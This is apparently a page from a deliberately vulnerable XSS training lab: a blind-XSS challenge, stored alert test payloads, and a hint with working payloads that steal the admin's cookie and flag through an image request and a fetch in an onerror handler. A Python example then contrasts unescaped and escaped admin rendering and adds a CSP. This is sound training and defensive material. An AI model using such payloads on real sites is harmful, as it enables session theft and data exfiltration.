Advanced XSS Lab

WAF Bypass | CSP Evasion | Filter Bypass | Advanced Techniques
ADVANCED
Level 7: Blind XSS
Submit a payload via the contact form. An admin bot will review it at a hidden /admin page. Your XSS fires there! Steal the flag from the admin page.
Expert
Blind XSS: Your payload is stored and rendered on the admin page at /admin.
The admin page does NOT escape HTML. Your XSS will execute there.
Use this to exfiltrate data. The flag is available at: /index.php?blind_flag=1 (returns JSON).
Submitted Messages
2026-05-03 14:56:49
<script>alert(document.domain)</script>
2026-05-03 14:52:19
<script>alert()</script>
Hint
The admin page at /admin renders your submission WITHOUT escaping. Use a payload like: <script>new Image().src='/index.php?blind_flag=1&c='+document.cookie</script> or use fetch() to send the flag. For this lab, the flag is directly visible when XSS fires. Try: <img src=x onerror="fetch('/index.php?blind_flag=1').then(r=>r.json()).then(d=>document.body.innerHTML+='FLAG:'+d.flag)">
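The lab description and the hint both turn on one fact: the /admin page inserts the stored message into its HTML without escaping. The following is an added example, not the lab's own code, showing a minimal rendering function in both forms and the check that tells them apart; the two stored messages are the ones listed on this page, the function and header names are assumed.

```python
import html

# Messages as the contact form stored them (taken from the submissions
# listed on this page; timestamps and bodies are the page's own values).
STORED_MESSAGES = [
    ("2026-05-03 14:56:49", "<script>alert(document.domain)</script>"),
    ("2026-05-03 14:52:19", "<script>alert()</script>"),
]


def render_admin_vulnerable(messages):
    """Mirrors the lab's /admin behaviour: the stored body is concatenated
    into the page unchanged, so any markup in it becomes live DOM when the
    admin bot loads the page. Kept here only as the 'before' state."""
    rows = "".join(f"<tr><td>{ts}</td><td>{body}</td></tr>"
                   for ts, body in messages)
    return f"<table>{rows}</table>"


def render_admin_escaped(messages):
    """Hardened version: every untrusted value is HTML-escaped at the point
    it enters the document. quote=True also neutralises the quote characters
    needed to break out of an attribute, so the same helper is safe there."""
    rows = "".join(
        f"<tr><td>{html.escape(ts, quote=True)}</td>"
        f"<td>{html.escape(body, quote=True)}</td></tr>"
        for ts, body in messages)
    return f"<table>{rows}</table>"


def admin_response_headers():
    """Second layer for the admin page (assumed header set): a CSP that
    forbids inline script, so even a missed escape cannot run <script> or
    an onerror handler. connect-src 'self' does not stop same-origin fetch,
    which is why output escaping, not CSP, is the primary control here."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; connect-src 'self'",
        "Content-Type": "text/html; charset=utf-8",
    }


def contains_live_script(rendered):
    """Self-check for the two renderers: an unescaped <script opener in the
    output is exactly what lets the stored payload execute on /admin."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_admin_vulnerable(STORED_MESSAGES))
    print(render_admin_escaped(STORED_MESSAGES))
```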